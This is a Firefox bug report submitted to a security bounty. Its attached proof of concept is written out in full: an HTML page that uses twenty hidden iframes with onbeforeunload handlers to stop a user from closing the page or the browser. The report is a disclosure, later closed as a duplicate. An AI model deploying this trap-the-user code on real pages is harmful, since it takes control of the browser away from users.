Closed Bug 915597 Opened 11 years ago Closed 11 years ago

making impossible to close a webpage and the browser

Categories

(Firefox :: Untriaged, defect)

Product:
Firefox
Component:
Untriaged
Version:
20 Branch
Platform:
x86
Windows Vista
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 636374

People

(Reporter: moserfred, Unassigned)

Details

Attachments

(1 file)

example.html
4.82 KB, text/plain
Details
Attached file example.html 
User Agent: Mozilla/5.0 (Windows NT 6.0; rv:20.0) Gecko/20100101 Firefox/20.0 (Beta/Release)
Build ID: 20130409194949

Steps to reproduce:



Hi team,


My name is F. Moser, I've been coding for 20 years. 
In the purpose of the Vulnerability Rewards Program, I've discovered 
a big bug in your browser. Here is a code example making
impossible to close a webpage or the browser.


- Imagine an advertising page always sticking your screen.
- Imagine a kidding webpage blocking a professional engineering process website.
- etc...


It works on most versions I could tried. While the running test,
don't panic, just click 20 times on the closing message. I've set to 20 times but imagine if
it was 100000 or an infinite loop.


- just paste the source code bellow this message in a notepad
- save the text file
- rename it with .html
- and run it with your browser
- I know that you know all that, but I want to be clear !


This is a proof of concept only for the browser's team to fix the bug.
It can not be used for other purpose


Waiting the result for the Vulnerability Rewards Program,
here is my name : F. Moser and you can only contact me with
this mail :   moserfred@gmx.com  (gmail bugs on my specific system)


Best Regards
F. Moser
moserfred@gmx.com







<html><body><center><h2><br>

Hi ! Now you <u>can not close</u> this webpage nor the browser !<br><br></h2>
<h3>Imagine an advertising sticking your screen...<br>
Imagine a kidding webpage blocking a <br>professional engineering process website...<br><br></h3>
<u>Don't panic ! Just click 20 times on the closing message "leave this page",</u><br>
and you will take control of the browser.<br>
I've set to 20 times, but imagine if it was 1000000...<br><br><br>
<u>This is a proof of concept only for the browser's team to fix the bug.<br>
It can not be used for other purpose</u><br><br>


<!-- -------------------------------------------------------------

THIS IS A PROOF OF CONCEPT ONLY FOR BROWSER'S TEAM TO FIX THE BUG. 
IT CAN NOT BE USED FOR OTHER PURPOSE. 
YES I KNOW, IT'S NOT AN OPTIMIZED CODE... 
BUT IT WORKS AND I WANTED TO BE CLEAR FOR READING !!!

-------------------------------------------------------------- -->


<iframe name="f1" id="f1" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f2" id="f2" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f3" id="f3" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f4" id="f4" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f5" id="f5" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f6" id="f6" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f7" id="f7" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f8" id="f8" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f9" id="f9" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f10" id="f10" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f11" id="f11" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f12" id="f12" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f13" id="f13" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f14" id="f14" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f15" id="f15" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f16" id="f16" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f17" id="f17" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f18" id="f18" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f19" id="f19" width=1 height=1 style="visibility:hidden"></iframe>
<iframe name="f20" id="f20" width=1 height=1 style="visibility:hidden"></iframe>

<script>{
f1.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f2.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f3.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f4.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f5.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f6.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f7.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f8.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f9.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f10.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f11.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f12.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f13.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f14.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f15.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f16.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f17.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f18.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f19.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')
f20.document.write('<html><body><scr'+'ipt>{window.onbeforeunload=parent.example}</scr'+'ipt></body></html>')


window.onbeforeunload=example
}
function example()
{return ""}
</script>



</center></body></html>
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 11 years ago
Flags: sec-bounty-
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: